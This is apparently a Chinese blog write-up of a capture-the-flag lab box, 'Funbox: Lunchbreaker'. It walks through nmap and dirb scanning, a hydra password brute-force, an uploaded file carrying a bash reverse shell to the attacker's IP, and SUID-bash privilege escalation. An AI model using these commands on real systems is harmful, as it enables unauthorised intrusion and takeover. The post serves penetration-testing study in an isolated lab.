题目描述
It's a box for beginners, but not easy. Gather careful !!!
Hint:
Don't waste your time ! Every BruteForce-Attack at all ports can be stopped after 1500 trys per account.
Enjoy the game and WYSIWYG !
This works better with VirtualBox rather than VMware
环境下载
- 戳此进行环境下载
Funbox: Lunchbreaker靶机搭建
- 将下载好的靶机环境,导入 VritualBox,设置为 Host-Only 模式
- 将 VMware 中桥接模式网卡设置为 VritualBox 的 Host-only
- 目标靶机的 IP 地址为:
192.168.56.117
- 攻击机的 IP 地址为:
192.168.56.102
![](https://i-blog.csdnimg.cn/blog_migrate/c3d7ab1ce88ae5b19674cf0c40de8497.png)
渗透测试
信息搜集
用 Nmap 扫描一下目标靶机的端口信息:
sudo nmap -sS -A -Pn 192.168.56.117
,发现开放了21、22、80、3306
四个端口
![](https://i-blog.csdnimg.cn/blog_migrate/c9b64773e81b89c90d870b9f27095f31.png)
用 dirb 扫描一下 80 端口 web 目录:
dirb http://192.168.56.116
![](https://i-blog.csdnimg.cn/blog_migrate/9a2b05f3960bd383ca8649a94e7da136.png)
漏洞挖掘
- web 页面没有什么发现,尝试匿名登录 ftp,提示用户
sky
![](https://i-blog.csdnimg.cn/blog_migrate/175cdc6c8104ab5c335e18192bf54ec4.png)
- 利用 hydra 爆破
sky
用户的密码,得到密码为thebest
hydra -l sky -P rockyou.txt 192.168.56.117 ssh
![](https://i-blog.csdnimg.cn/blog_migrate/9a2b05f3960bd383ca8649a94e7da136.png)
- 登录 ftp,发现存在一个文件
user.flag
,下载到本地查看后发现可以改写内容来反弹 shell
![](https://i-blog.csdnimg.cn/blog_migrate/39a5d94c6f827e7fe5eb42598543d7ec.png)
![](https://i-blog.csdnimg.cn/blog_migrate/613cc5bc260e0664dc9995959a3bd562.png)
#!/bin/sh
bash -i >& /dev/tcp/192.168.56.102/1234 0>&1;
- 将改写好的文件重新上传回去
![](https://i-blog.csdnimg.cn/blog_migrate/5dfb15914bf3dfb0a5ee655683628f5c.png)
getshell
- 开启 nc 监听,成功接收到反弹的 shell
![](https://i-blog.csdnimg.cn/blog_migrate/2a2cad96ebc94d15bab2420b4ff452a1.png)
提权
- 由于
sudo -l
命令不知道密码无法使用,执行命令find / -perm -u=s -type f 2>/dev/null
,查看可以利用啥来进行提权
![](https://i-blog.csdnimg.cn/blog_migrate/b359d8712b87da1eb0289ad42e883faf.png)
- 利用
/bin/bash -p
来进行提权,成功拿到 root 权限
![](https://i-blog.csdnimg.cn/blog_migrate/4898d143916712dea1ec024209cf845d.png)